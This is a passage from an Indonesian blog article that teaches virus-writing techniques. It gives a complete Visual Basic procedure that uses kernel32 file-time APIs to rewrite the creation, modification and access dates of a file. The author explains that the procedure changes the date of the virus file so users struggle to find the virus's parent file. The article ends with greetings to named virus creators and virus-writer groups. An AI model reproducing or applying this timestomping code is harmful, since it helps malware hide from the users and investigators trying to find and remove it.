Public Declare Function SetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long Public Declare Function GetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long Public Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Public Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Public Declare Function SystemTimeToFileTime Lib "kernel32" (lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Public Declare Function LocalFileTimeToFileTime Lib "kernel32" (lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Public Declare Function OpenFile Lib "kernel32" (ByVal lpFileName As String, lpReOpenBuff As OFSTRUCT, ByVal wStyle As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Const OF_READ = &H0 Public Const OF_READWRITE = &H2 Public Const OF_REOPEN = &H8000
Public Const OF_SHARE_COMPAT = &H0 Public Const OF_SHARE_DENY_NONE = &H40 Public Const OF_SHARE_DENY_READ = &H30 Public Const OF_SHARE_DENY_WRITE = &H20 Public Const OF_SHARE_EXCLUSIVE = &H10 Public Const OF_VERIFY = &H400 Public Const OF_WRITE = &H1 Public Const OFS_MAXPATHNAME = 128
Public Type OFSTRUCT cBytes As Byte fFixedDisk As Byte nErrCode As Integer Reserved1 As Integer Reserved2 As Integer
szPathName(OFS_MAXPATHNAME) As Byte End Type
Public Type FILETIME dwLowDateTime As Long dwHighDateTime As Long
End Type
Public Type SYSTEMTIME wYear As Integer wMonth As Integer wDayOfWeek As Integer wDay As Integer wHour As Integer wMinute As Integer wSecond As Integer
wMilliseconds As Integer End Type
Public Sub ubahtanggal(pathfil As String, hari As Long, bulan As Long, tahun As Long, Optional creat As Boolean, Optional modif As Boolean, Optional acces As Boolean) On Error Resume Next
Dim hfile As Long, rval As Long Dim buff As OFSTRUCT
Dim ctime As FILETIME, latime As FILETIME, mtime As FILETIME Dim stime As SYSTEMTIME
Dim fil As String
If IsMissing(creat) Then creat = False If IsMissing(modif) Then modif = False If IsMissing(acces) Then acces = False
hfile = OpenFile(pathfil, buff, OF_WRITE) If hfile Then
rval = GetFileTime(hfile, ctime, latime, mtime) If creat Then
rval = FileTimeToLocalFileTime(ctime, ctime) rval = FileTimeToSystemTime(ctime, stime)
stime.wYear = tahun stime.wMonth = bulan stime.wDay = hari stime.wHour = Hour(Time) stime.wMinute = Minute(Time) stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, ctime) rval = LocalFileTimeToFileTime(ctime, ctime)
End If
If modif Then
rval = FileTimeToLocalFileTime(mtime, mtime) rval = FileTimeToSystemTime(mtime, stime)
stime.wYear = tahun stime.wMonth = bulan stime.wDay = hari
stime.wHour = Hour(Time) stime.wMinute = Minute(Time) stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, mtime) rval = LocalFileTimeToFileTime(mtime, mtime)
End If
If acces Then
rval = FileTimeToLocalFileTime(latime, latime) rval = FileTimeToSystemTime(latime, stime)
stime.wYear = tahun stime.wMonth = bulan stime.wDay = hari stime.wHour = Hour(Time) stime.wMinute = Minute(Time) stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, latime) rval = LocalFileTimeToFileTime(latime, latime)
End If
rval = SetFileTime(hfile, ctime, latime, mtime) End If
rval = CloseHandle(hfile) End Sub
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Prosedur ubahtanggal akan merubah date dari file virus, dengan parameter hari, bulan dan tahun sesuai dengan yang kita inginkan. Parameter creat, modif dan acces menunjukkan date atau time mana yang akan diubah, Sebagai contoh bila acces bernilai True dan lainnya bernilai False maka hanya date dan time acces saja yang akan diubah.
$> End...
Karena keterbatasan tempat dan waktu maka saya hanya bisa membeberkan 2 teknik saja yang saya kira dapat digunakan untuk mempersulit User dalam mencari File Induk dari Virus. Saya ingin memohon maaf apabila ada ekurangan atau pernyataan yang menyinggung pembaca.
$ Greetz...
>Myztx @ Myztx Soft. House, Hellspawn, Brontok Creator, Tomero, MyHeart Creator, Kantuk Creator, n The other Vx3rs.
>All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack, Informatics_01, ProgrammerVB n the others.
>Spyro, Vaganci, Yanto, n All my Friends at IA01 [2005], IA07 [2004] @ GunaDarma University, Depok.
>marskarthik@angelfire.com, (Naveed) neenojee@hotmail.com.
>Sites : VbBego.com, Virologi.info, Vaksin.com, Planet-Source-Code.com n the others.
$ Contact...
>Saran, Kritik, Caci-maki, Dll diharapkan dan ditujukan pada alamat email :
Kategori:
Artikel Komputer
Posting Komentar